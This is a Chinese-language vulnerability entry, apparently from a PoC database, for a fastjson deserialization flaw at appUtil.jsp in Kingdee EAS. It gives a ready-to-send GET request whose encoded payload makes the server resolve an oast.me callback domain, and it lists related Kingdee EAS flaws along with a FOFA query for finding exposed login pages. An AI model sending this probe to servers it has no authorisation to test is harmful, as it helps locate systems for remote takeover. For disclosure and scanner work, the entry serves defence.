金蝶EAS /appUtil.jsp 路径存在 FasJson 反序列化漏洞

漏洞描述

金蝶EAS是一款十分出色的企业管理软件。其旧版本中使用了旧fastjson依赖，攻击者可构造恶意请求触发fastjson反序列化漏洞，造成远程代码执行，控制服务器。

PoC代码

GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22csbs1ru8ki46d67eiob0ywz51btedcjtj.oast.me%22%7D%7D HTTP/1.1

相关漏洞推荐

jindie-eas-autologin-rce: 金蝶 EAS Cloud autoLogin.jsp 远程代码执行漏洞 POC

2025-09-01 | 金蝶EAS Cloud

金蝶 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS Cloud 的autoLogin.jsp 路径存在远程代码执行漏洞，攻击者...
金蝶EAS /easportal/autoLogin.jsp 代码执行漏洞 POC

2025-07-04 | 金蝶EAS

金蝶EAS是一款企业级应用系统，主要用于企业资源计划（ERP）管理。该漏洞存在于/easportal/autoLogin.jsp路径中，攻击者可以通过构造恶意HTTP请求触发代码执行，进而完全控制服务...
金蝶-EAS-Cloud 弱口令漏洞无POC

2024-12-19 | 金蝶EAS

弱口令漏洞指的是系统中使用了简单、容易猜测或常见的密码，导致攻击者可以通过猜测或暴力破解的方式轻易获取账户权限，进而访问或控制受影响的系统资源。这种漏洞通常由于缺乏有效的密码策略或用户对安全意识的忽视...
kingdee-eas-myuploadfile-fileupload: 金蝶EAS myUploadFile接口任意文件上传 POC

2025-09-01 | kingdee eas

FOFA: title=="EAS系统登录"
LemonLDAP::NG 操作系统命令注入漏洞无POC

2025-09-20 00:03:21 | LemonLDAP::NG

LemonLDAP::NG是LemonLDAP::NG开源的一套Web单点登录和访问管理软件。 LemonLDAP::NG 2.16.7之前版本和2.17版本至2.21.3之前版本存在操作系统命令注入...

漏洞描述

PoC代码

相关漏洞推荐

jindie-eas-autologin-rce: 金蝶 EAS Cloud autoLogin.jsp 远程代码执行漏洞 POC

金蝶EAS /easportal/autoLogin.jsp 代码执行漏洞 POC

金蝶-EAS-Cloud 弱口令漏洞 无POC

kingdee-eas-myuploadfile-fileupload: 金蝶EAS myUploadFile接口任意文件上传 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

金蝶-EAS-Cloud 弱口令漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC